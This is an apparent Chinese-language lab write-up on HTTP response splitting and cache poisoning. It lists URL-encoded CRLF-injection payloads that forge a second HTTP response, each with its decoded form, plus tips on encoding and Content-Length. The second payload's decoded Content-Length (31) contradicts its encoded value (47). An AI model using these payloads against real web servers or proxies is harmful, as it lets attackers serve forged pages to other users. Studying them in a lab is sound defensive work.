General——HTTP Splitting
1、HTTP Splitting
输入:
en%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3Atext%2Fhtml%0D%0AContent-Length%3A%2031%0D%0A%3Chtml%3E%20hacked%20successfully%3C%2Fhtml%3E
即:
en
Content-Length: 0
HTTP/1.1 200 OK
Content-Type:text/html
Content-Length: 31
<html> hacked successfully</html>
2、Cache Posioning
输入:
en%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202011%2014%3A50%3A18%20GMT%0D%0AContent-Length%3A%2047%0D%0A%3Chtml%3Ehacked%20successfully%3C%2Fhtml%3E
即:
en
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 27 Oct 2011 14:50:18 GMT
Content-Length: 31
<html>hacked successfully</html>
要点:
1、%0A需要用%0D%0A(回车换行)替换,替换工具http://yehg.net/encoding/,只有在FF下所有功能才可使用,否则有功能缺失。
2、HTTP/1.1 200 OK之前必须有空行。(协议包格式)
3、一般响应头中的Expires: Thu, 01 Jan 1970 08:00:00 CST,Date: Fri, 22 Oct 2010 12:04:04 GMT,写入代码后攻击不成。
4、正常输入en后必须有Content-Length: 0。(标识请求结束?,冒号后必须有空格,格式要求)构造的响应中的Content-Length必须正常,不能小于包正文的长度。
5、html代码中的回车换行不能再用%0D%0A替换,可以用%0D。html正文代码中的内容如<,>,:等,包括空格,可以不用编码替换。
6、通信过程:(见图)
(1)第一次POST及响应
(2)第二次GET
(3)第二次GET及响应
注意proxy缓存处理的问题,注意普通的第二次请求与构造的处理不同,http response splitting 效果查看辅助的工具ff Tamper Data插件。
参考链接:
Http代理穿透技术http://lcx.cc/?FoxNews=317.html